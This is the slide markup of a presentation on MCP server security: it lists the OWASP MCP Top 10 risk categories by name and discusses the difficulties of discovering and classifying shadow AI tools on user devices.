            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MCP03 - Tool Poisoning</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MCP04 - Supply Chain Attacks </a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MCP05 - Command Injection</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MCP06 - Intent Flow Subversion</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MCP07 - Insufficient Auth</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MCP08 - Lack of Audit/Telemetry</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MCP09 - Shadow MCP Servers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MCP10 - Context Injection &amp; Over-Sharing</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Google Shape;178;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="359875"/>
            <a:ext cx="5443500" cy="936000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>The Attacks</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="Google Shape;179;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="827875"/>
            <a:ext cx="6412200" cy="2772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en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="474441"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>OWASP MCP Top 10</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="474441"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="180" name="Google Shape;180;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5098275" y="1382825"/>
            <a:ext cx="3547750" cy="2377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4" name="Shape 184"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="Google Shape;185;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="359875"/>
            <a:ext cx="7689600" cy="936000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>Discovery &amp; Classification</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="Google Shape;186;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163625" y="1507300"/>
            <a:ext cx="6412200" cy="3693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en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="474441"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>Finding and Classifying Shadow AI</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="474441"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="187" name="Google Shape;187;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2657100" y="2498950"/>
            <a:ext cx="3425251" cy="24900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1" name="Shape 191"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Google Shape;192;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550350" y="1433650"/>
            <a:ext cx="8642700" cy="116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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Major Gaps:</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>STDIO - Network is too late</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP/SSE requires TLS decryption </a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Endpoint detection (EDR/XDR) lacks the right granularity</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The right data won’t be in your SIEM (today)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Google Shape;193;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="359875"/>
            <a:ext cx="7873200" cy="468000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>Discovery &amp; Classification</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Google Shape;194;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="827875"/>
            <a:ext cx="6412200" cy="5541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en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="474441"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>Obviously Use Existing Tooling</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="474441"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="474441"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="195" name="Google Shape;195;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2652003" y="2785750"/>
            <a:ext cx="3840000" cy="21590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9" name="Shape 199"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="Google Shape;200;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550350" y="1433650"/>
            <a:ext cx="8642700" cy="15492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chemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The configs live in user-space files on user’s laptops and devices</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Skills and instruction files are scattered across repos and home directories</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You need to scan every machine, not just servers</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>At scale: fleet-wide scanning, device-to-identity mapping</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Operationally hard - distributed teams, varied device management maturity, BYOD</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Google Shape;201;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="359875"/>
            <a:ext cx="7873200" cy="468000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>Discovery &amp; Classification</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="Google Shape;202;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="827875"/>
            <a:ext cx="6412200" cy="5541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en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="474441"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>You Need Data From the Device</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="474441"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="474441"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="203" name="Google Shape;203;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2694300" y="2852950"/>
            <a:ext cx="3755425" cy="2112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1" name="Shape 61"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Google Shape;62;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="967200" y="366722"/>
            <a:ext cx="3303300" cy="468000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
